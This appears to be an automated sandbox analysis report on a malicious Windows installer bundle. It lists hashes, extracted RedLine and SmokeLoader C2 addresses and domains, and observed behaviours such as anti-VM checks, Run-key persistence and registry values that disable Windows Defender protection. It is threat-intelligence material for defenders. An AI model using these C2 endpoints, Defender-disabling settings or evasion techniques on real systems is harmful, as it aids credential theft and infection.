Overview
overview
10Static
static
Setup (1).exe
windows11_x64
10Setup (10).exe
windows11_x64
10Setup (11).exe
windows11_x64
10Setup (12).exe
windows11_x64
10Setup (13).exe
windows11_x64
10Setup (14).exe
windows11_x64
10Setup (15).exe
windows11_x64
10Setup (16).exe
windows11_x64
10Setup (17).exe
windows11_x64
10Setup (18).exe
windows11_x64
10Setup (19).exe
windows11_x64
10Setup (2).exe
windows11_x64
10Setup (20).exe
windows11_x64
10Setup (21).exe
windows11_x64
Setup (22).exe
windows11_x64
Setup (23).exe
windows11_x64
1Setup (24).exe
windows11_x64
10Setup (25).exe
windows11_x64
10Setup (26).exe
windows11_x64
10Setup (27).exe
windows11_x64
10Setup (28).exe
windows11_x64
10Setup (29).exe
windows11_x64
10Setup (3).exe
windows11_x64
10Setup (30).exe
windows11_x64
10Setup (31).exe
windows11_x64
10Setup (4).exe
windows11_x64
10Setup (5).exe
windows11_x64
10Setup (6).exe
windows11_x64
10Setup (7).exe
windows11_x64
10Setup (8).exe
windows11_x64
1Setup (9).exe
windows11_x64
10Setup.exe
windows11_x64
10Resubmissions
15/10/2024, 15:36
241015-s1zlzasdkc 1001/07/2024, 18:32
240701-w6yteawhmq 1001/07/2024, 14:52
240701-r82wmaxdnd 1001/07/2024, 14:52
240701-r8syqa1dpp 1011/03/2024, 21:22
240311-z8dsssgg58 1001/09/2021, 13:18
210901-5bmxjspa5s 1001/09/2021, 13:04
210901-te4btfspqa 1001/09/2021, 05:12
210901-4wnkwm1p3j 1031/08/2021, 21:47
210831-41rp97dma2 10Analysis
-
max time kernel
386s -
max time network
1765s -
platform
windows11_x64 -
resource
win11 -
submitted
21/08/2021, 19:20
Static task
static1
Behavioral task
behavioral1
Sample
Setup (1).exe
Resource
win11
Behavioral task
behavioral2
Sample
Setup (10).exe
Resource
win11
Behavioral task
behavioral3
Sample
Setup (11).exe
Resource
win11
Behavioral task
behavioral4
Sample
Setup (12).exe
Resource
win11
Behavioral task
behavioral5
Sample
Setup (13).exe
Resource
win11
Behavioral task
behavioral6
Sample
Setup (14).exe
Resource
win11
Behavioral task
behavioral7
Sample
Setup (15).exe
Resource
win11
Behavioral task
behavioral8
Sample
Setup (16).exe
Resource
win11
Behavioral task
behavioral9
Sample
Setup (17).exe
Resource
win11
Behavioral task
behavioral10
Sample
Setup (18).exe
Resource
win11
Behavioral task
behavioral11
Sample
Setup (19).exe
Resource
win11
Behavioral task
behavioral12
Sample
Setup (2).exe
Resource
win11
Behavioral task
behavioral13
Sample
Setup (20).exe
Resource
win11
Behavioral task
behavioral14
Sample
Setup (21).exe
Resource
win11
Behavioral task
behavioral15
Sample
Setup (22).exe
Resource
win11
Behavioral task
behavioral16
Sample
Setup (23).exe
Resource
win11
Behavioral task
behavioral17
Sample
Setup (24).exe
Resource
win11
Behavioral task
behavioral18
Sample
Setup (25).exe
Resource
win11
Behavioral task
behavioral19
Sample
Setup (26).exe
Resource
win11
Behavioral task
behavioral20
Sample
Setup (27).exe
Resource
win11
Behavioral task
behavioral21
Sample
Setup (28).exe
Resource
win11
Behavioral task
behavioral22
Sample
Setup (29).exe
Resource
win11
Behavioral task
behavioral23
Sample
Setup (3).exe
Resource
win11
Behavioral task
behavioral24
Sample
Setup (30).exe
Resource
win11
Behavioral task
behavioral25
Sample
Setup (31).exe
Resource
win11
Behavioral task
behavioral26
Sample
Setup (4).exe
Resource
win11
Behavioral task
behavioral27
Sample
Setup (5).exe
Resource
win11
Behavioral task
behavioral28
Sample
Setup (6).exe
Resource
win11
Behavioral task
behavioral29
Sample
Setup (7).exe
Resource
win11
Behavioral task
behavioral30
Sample
Setup (8).exe
Resource
win11
Behavioral task
behavioral31
Sample
Setup (9).exe
Resource
win11
Behavioral task
behavioral32
Sample
Setup.exe
Resource
win11
General
-
Target
Setup (18).exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
redline
19.08
95.181.172.100:6795
Extracted
redline
dibild
135.148.139.222:33569
Extracted
smokeloader
2020
http://readinglistforaugust1.xyz/
http://readinglistforaugust2.xyz/
http://readinglistforaugust3.xyz/
http://readinglistforaugust4.xyz/
http://readinglistforaugust5.xyz/
http://readinglistforaugust6.xyz/
http://readinglistforaugust7.xyz/
http://readinglistforaugust8.xyz/
http://readinglistforaugust9.xyz/
http://readinglistforaugust10.xyz/
http://readinglistforaugust1.site/
http://readinglistforaugust2.site/
http://readinglistforaugust3.site/
http://readinglistforaugust4.site/
http://readinglistforaugust5.site/
http://readinglistforaugust6.site/
http://readinglistforaugust7.site/
http://readinglistforaugust8.site/
http://readinglistforaugust9.site/
http://readinglistforaugust10.site/
http://readinglistforaugust1.club/
http://readinglistforaugust2.club/
http://readinglistforaugust3.club/
http://readinglistforaugust4.club/
http://readinglistforaugust5.club/
http://readinglistforaugust6.club/
http://readinglistforaugust7.club/
http://readinglistforaugust8.club/
http://readinglistforaugust9.club/
http://readinglistforaugust10.club/
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba Payload 1 IoCs
resource yara_rule behavioral10/memory/4196-370-0x0000000004960000-0x0000000005286000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3508 4848 rundll32.exe 17 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3552 4848 rundll32.exe 17 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7972 4848 rundll32.exe 17 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
resource yara_rule behavioral10/memory/4372-282-0x0000000000000000-mapping.dmp family_redline behavioral10/memory/4372-287-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral10/memory/772-340-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral10/memory/772-336-0x0000000000000000-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 32 IoCs
description pid Process procid_target PID 3140 created 3240 3140 WerFault.exe 99 PID 2236 created 4876 2236 WerFault.exe 120 PID 5084 created 4372 5084 WerFault.exe 121 PID 1444 created 3980 1444 WerFault.exe 89 PID 2180 created 2372 2180 WerFault.exe 93 PID 3368 created 4108 3368 WerFault.exe 86 PID 2696 created 4496 2696 WerFault.exe 273 PID 664 created 3852 664 WerFault.exe 367 PID 2500 created 4196 2500 WerFault.exe 80 PID 4076 created 1540 4076 WerFault.exe 152 PID 4652 created 2708 4652 rundll32.exe 172 PID 6896 created 5876 6896 Cleaner_Installation.exe 217 PID 6264 created 1848 6264 Esplorarne.exe.com 371 PID 5356 created 6688 5356 WerFault.exe 240 PID 5312 created 6032 5312 WerFault.exe 204 PID 6852 created 5924 6852 WerFault.exe 189 PID 6760 created 5836 6760 svchost.exe 491 PID 1400 created 6272 1400 WerFault.exe 208 PID 6136 created 5892 6136 aipackagechainer.exe 215 PID 6872 created 4652 6872 WerFault.exe 279 PID 4004 created 5576 4004 WerFault.exe 178 PID 2840 created 1028 2840 WerFault.exe 185 PID 5840 created 5916 5840 WerFault.exe 274 PID 6696 created 7020 6696 WerFault.exe 246 PID 6220 created 784 6220 DrvInst.exe 285 PID 6736 created 5324 6736 WerFault.exe 289 PID 4116 created 6960 4116 WerFault.exe 225 PID 4080 created 4368 4080 WerFault.exe 257 PID 6376 created 7684 6376 WerFault.exe 400 PID 6972 created 7628 6972 Process not Found 408 PID 4080 created 4348 4080 WerFault.exe 417 PID 4504 created 7472 4504 WerFault.exe 433 -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 7444 created 6188 7444 svchost.exe 376 PID 7444 created 6188 7444 svchost.exe 376 -
Turns off Windows Defender SpyNet reporting 2 TTPs
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Nirsoft 3 IoCs
resource yara_rule behavioral10/memory/1304-347-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft behavioral10/files/0x000300000002b22c-346.dat Nirsoft behavioral10/files/0x000300000002b22c-345.dat Nirsoft -
Vidar Stealer 3 IoCs
resource yara_rule behavioral10/memory/4108-330-0x00000000041B0000-0x000000000424D000-memory.dmp family_vidar behavioral10/memory/772-360-0x00000000053E0000-0x00000000059F8000-memory.dmp family_vidar behavioral10/memory/1540-408-0x0000000004A00000-0x0000000004A9D000-memory.dmp family_vidar -
Blocklisted process makes network request 20 IoCs
flow pid Process 122 2028 cmd.exe 124 2028 cmd.exe 132 2028 cmd.exe 139 2028 cmd.exe 144 2028 cmd.exe 232 2028 cmd.exe 271 1172 MsiExec.exe 273 1172 MsiExec.exe 275 1172 MsiExec.exe 278 1172 MsiExec.exe 281 1172 MsiExec.exe 317 1172 MsiExec.exe 331 1172 MsiExec.exe 317 1172 MsiExec.exe 334 1172 MsiExec.exe 271 1172 MsiExec.exe 278 1172 MsiExec.exe 281 1172 MsiExec.exe 275 1172 MsiExec.exe 273 1172 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts 3377047_logo_media.exe File opened for modification C:\Windows\System32\drivers\SET23EA.tmp DrvInst.exe File created C:\Windows\System32\drivers\SET23EA.tmp DrvInst.exe File opened for modification C:\Windows\System32\drivers\tap0901.sys DrvInst.exe -
Executes dropped EXE 64 IoCs
pid Process 2372 Z2fzHFHabHFBTcXc0he2LfvC.exe 4424 RwRO9FbDB2r7KpXTPV_gVLzk.exe 3604 D9t_w3e0AQMrrfnq7ZreWa6s.exe 3632 xlwGhHKzOqtDuIGACjLOdzuw.exe 4988 ii6bmnn9p_oIqp2fsxJz8bSj.exe 3980 lYgPFGrH4dK8txjhRvB6UDnS.exe 4936 kbLdxOKdaa1P0Pik5EHanq7S.exe 3560 7ly35PFpELh0zl4A71KGHssh.exe 4496 UOjhInMKimcRVpv7WIUnWJnx.exe 4512 s0nZi5PwZllOQFkbPY6S_tdk.exe 4048 52qY9qlXIkiQ9LxFOBKrtOl3.exe 3620 fUf8GFAg_E3p4seDzYoR9QhL.exe 1180 zKZt3szLPdXZ8XSxKGOVzcox.exe 4196 lC2ohBQ4dxmUiua5D84NthAo.exe 4108 tLka0ssRdDotXFHNfLe1Aga8.exe 3852 w5Kud0JezoOd4Ag2HSy_hDMJ.exe 3240 tMSPWWCNJdpIjZyxpqPsEuy1.exe 856 yXQtBZxC3yLClZBXHRXyhCMO.exe 4900 0UJwrKoMGuTbU9Nq5Dx6Hhz8.exe 1560 jooyu.exe 1556 Ophc0Uzlgkux14AnOgTuCGrs.exe 1572 md8_8eus.exe 4732 customer3.exe 4392 Ophc0Uzlgkux14AnOgTuCGrs.tmp 4876 0UJwrKoMGuTbU9Nq5Dx6Hhz8.exe 4580 jfiag3g_gg.exe 4372 ii6bmnn9p_oIqp2fsxJz8bSj.exe 4964 hBS_VbW.EXE 784 72DD.exe 420 fUf8GFAg_E3p4seDzYoR9QhL.exe 772 msedge.exe 1304 11111.exe 4120 11111.exe 3032 Setup.exe 2784 jfiag3g_gg.exe 1540 LGCH2-401_2021-08-18_14-40.exe 1584 Inlog.exe 2336 Cleaner Installation.exe 960 WEATHER Manager.exe 2028 cmd.exe 1376 VPN.exe 1688 WEATHER Manager.tmp 2660 md7_7dfj.exe 3496 VPN.tmp 4708 11111.exe 2708 askinstall53.exe 1248 msedge.exe 4768 PBrowFile15.exe 3228 Esplorarne.exe.com 4012 Esplorarne.exe.com 2976 LivelyScreenRecS1.9.exe 3300 xtect12.exe 3476 11111.exe 4528 3377047_logo_media.exe 5464 zhaoy-game.exe 5576 3874298.exe 5696 7529954.exe 5824 7643317.exe 5972 1736868.exe 1028 8428532.exe 5184 Setup.exe 5820 lJbTck088lHvWeCNKbcD_h4M.exe 5780 WerFault.exe 5876 8lmDih8V2BGpLnds_D6VngZP.exe -
resource yara_rule behavioral10/files/0x000200000002b21c-266.dat upx behavioral10/files/0x000200000002b21c-265.dat upx -
Checks BIOS information in registry 2 TTPs 22 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion kbLdxOKdaa1P0Pik5EHanq7S.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion IdYe_ZwytQK0N9XMqLr6tNKJ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion IdYe_ZwytQK0N9XMqLr6tNKJ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion B16E.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion B16E.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion F473.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion kbLdxOKdaa1P0Pik5EHanq7S.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion zKZt3szLPdXZ8XSxKGOVzcox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RK4JhWyyV2gZRlLMqbVEjvgp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 52qY9qlXIkiQ9LxFOBKrtOl3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6moy6ZUQk6HST4lKiS4dsYv2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RK4JhWyyV2gZRlLMqbVEjvgp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion lJbTck088lHvWeCNKbcD_h4M.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion lJbTck088lHvWeCNKbcD_h4M.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 42B3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 42B3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion F473.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion RwRO9FbDB2r7KpXTPV_gVLzk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion RwRO9FbDB2r7KpXTPV_gVLzk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion zKZt3szLPdXZ8XSxKGOVzcox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6moy6ZUQk6HST4lKiS4dsYv2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 52qY9qlXIkiQ9LxFOBKrtOl3.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iZpAWbaURv.url Esplorarne.exe.com -
Loads dropped DLL 64 IoCs
pid Process 4392 Ophc0Uzlgkux14AnOgTuCGrs.tmp 4392 Ophc0Uzlgkux14AnOgTuCGrs.tmp 4960 rundll32.exe 2336 Cleaner Installation.exe 2028 cmd.exe 2028 cmd.exe 1688 WEATHER Manager.tmp 1688 WEATHER Manager.tmp 3496 VPN.tmp 3496 VPN.tmp 3228 Esplorarne.exe.com 5184 Setup.exe 6884 0HlVITTuFEgXTQKLdxctFRHr.tmp 6884 0HlVITTuFEgXTQKLdxctFRHr.tmp 1848 WerFault.exe 868 msedge.exe 6072 Setup.tmp 6072 Setup.tmp 6352 MsiExec.exe 6352 MsiExec.exe 6072 Setup.tmp 6072 Setup.tmp 6508 MsiExec.exe 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6072 Setup.tmp 6508 MsiExec.exe 6508 MsiExec.exe 4652 rundll32.exe 6808 GameBoxWin64.exe 6808 GameBoxWin64.exe 5652 svrwebui.exe 5652 svrwebui.exe 5652 svrwebui.exe 5652 svrwebui.exe 5652 svrwebui.exe 5652 svrwebui.exe 1172 MsiExec.exe 6808 GameBoxWin64.exe 6752 MsiExec.exe 6752 MsiExec.exe 1172 MsiExec.exe 1172 MsiExec.exe 1172 MsiExec.exe 1172 MsiExec.exe 1172 MsiExec.exe 1172 MsiExec.exe 1172 MsiExec.exe 1172 MsiExec.exe 1172 MsiExec.exe 8064 mask_svc.exe 8064 mask_svc.exe 8064 mask_svc.exe 8064 mask_svc.exe 8064 mask_svc.exe 8064 mask_svc.exe 7740 installer.exe 7740 installer.exe 7740 installer.exe 6300 MsiExec.exe 6300 MsiExec.exe 6072 Setup.tmp 6072 Setup.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral10/files/0x000100000002b1d8-178.dat themida behavioral10/files/0x000100000002b1f5-182.dat themida behavioral10/files/0x000100000002b1f6-173.dat themida behavioral10/files/0x000100000002b1f2-164.dat themida behavioral10/files/0x000100000002b1f2-199.dat themida behavioral10/files/0x000100000002b1d8-200.dat themida behavioral10/files/0x000100000002b1f5-201.dat themida behavioral10/files/0x000100000002b1f6-207.dat themida behavioral10/memory/4048-244-0x00000000005E0000-0x00000000005E1000-memory.dmp themida behavioral10/memory/1180-275-0x0000000000260000-0x0000000000261000-memory.dmp themida behavioral10/memory/4424-264-0x0000000000690000-0x0000000000691000-memory.dmp themida behavioral10/memory/4936-254-0x00000000009F0000-0x00000000009F1000-memory.dmp themida -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths 8450.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions 8450.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet 8450.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" 8450.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 8450.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\8450.exe = "0" 8450.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection 8450.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 8450.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" 8450.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 8450.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 7529954.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\INL Corpo Brovse\\Gaejihaedapo.exe\"" 3377047_logo_media.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" msedge.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run aipackagechainer.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\ aipackagechainer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RK4JhWyyV2gZRlLMqbVEjvgp.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA IdYe_ZwytQK0N9XMqLr6tNKJ.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md7_7dfj.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA F473.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA kbLdxOKdaa1P0Pik5EHanq7S.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RwRO9FbDB2r7KpXTPV_gVLzk.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA zKZt3szLPdXZ8XSxKGOVzcox.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6moy6ZUQk6HST4lKiS4dsYv2.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA lJbTck088lHvWeCNKbcD_h4M.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 42B3.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA B16E.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 52qY9qlXIkiQ9LxFOBKrtOl3.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\X: Cleaner Installation.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: Cleaner Installation.exe File opened (read-only) \??\K: Setup.exe File opened (read-only) \??\Q: Setup.exe File opened (read-only) \??\A: GameBoxWin64.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\Y: Cleaner Installation.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\G: GameBoxWin64.exe File opened (read-only) \??\J: Cleaner Installation.exe File opened (read-only) \??\S: Setup.exe File opened (read-only) \??\E: Cleaner Installation.exe File opened (read-only) \??\F: Cleaner Installation.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\U: Setup.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\B: Cleaner Installation.exe File opened (read-only) \??\I: Cleaner Installation.exe File opened (read-only) \??\V: Cleaner Installation.exe File opened (read-only) \??\W: Cleaner Installation.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\V: Setup.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\G: Cleaner Installation.exe File opened (read-only) \??\N: Setup.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\A: Setup.exe File opened (read-only) \??\E: GameBoxWin64.exe File opened (read-only) \??\U: GameBoxWin64.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\H: Cleaner Installation.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\H: GameBoxWin64.exe File opened (read-only) \??\O: GameBoxWin64.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\M: Cleaner Installation.exe File opened (read-only) \??\J: Setup.exe File opened (read-only) \??\M: Setup.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\V: GameBoxWin64.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\K: GameBoxWin64.exe File opened (read-only) \??\M: GameBoxWin64.exe File opened (read-only) \??\X: GameBoxWin64.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\B: GameBoxWin64.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 54 ipinfo.io 151 ipinfo.io 104 ipinfo.io 119 ipinfo.io 124 ipinfo.io 131 ipinfo.io 234 ipinfo.io 4 ipinfo.io 31 ipinfo.io 63 ip-api.com -
Drops file in System32 directory 16 IoCs
description ioc Process File opened for modification C:\Windows\System32\DriverStore\Temp\{124e1c34-c810-594d-9058-79719cfeb151} DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF tapinstall.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{124e1c34-c810-594d-9058-79719cfeb151}\SETFB54.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{124e1c34-c810-594d-9058-79719cfeb151}\SETFB54.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{124e1c34-c810-594d-9058-79719cfeb151}\SETFB64.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{124e1c34-c810-594d-9058-79719cfeb151}\SETFB65.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{124e1c34-c810-594d-9058-79719cfeb151}\oemvista.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{124e1c34-c810-594d-9058-79719cfeb151}\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{124e1c34-c810-594d-9058-79719cfeb151}\tap0901.cat DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{124e1c34-c810-594d-9058-79719cfeb151}\SETFB65.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{124e1c34-c810-594d-9058-79719cfeb151}\SETFB64.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf DrvInst.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt DrvInst.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
pid Process 4936 kbLdxOKdaa1P0Pik5EHanq7S.exe 4048 52qY9qlXIkiQ9LxFOBKrtOl3.exe 4424 RwRO9FbDB2r7KpXTPV_gVLzk.exe 1180 zKZt3szLPdXZ8XSxKGOVzcox.exe 5984 IdYe_ZwytQK0N9XMqLr6tNKJ.exe 1056 RK4JhWyyV2gZRlLMqbVEjvgp.exe 5140 6moy6ZUQk6HST4lKiS4dsYv2.exe 5820 lJbTck088lHvWeCNKbcD_h4M.exe 3256 42B3.exe 1624 B16E.exe 5756 F473.exe 4656 mask_svc.exe 7004 mask_svc.exe 8064 mask_svc.exe -
Suspicious use of SetThreadContext 7 IoCs
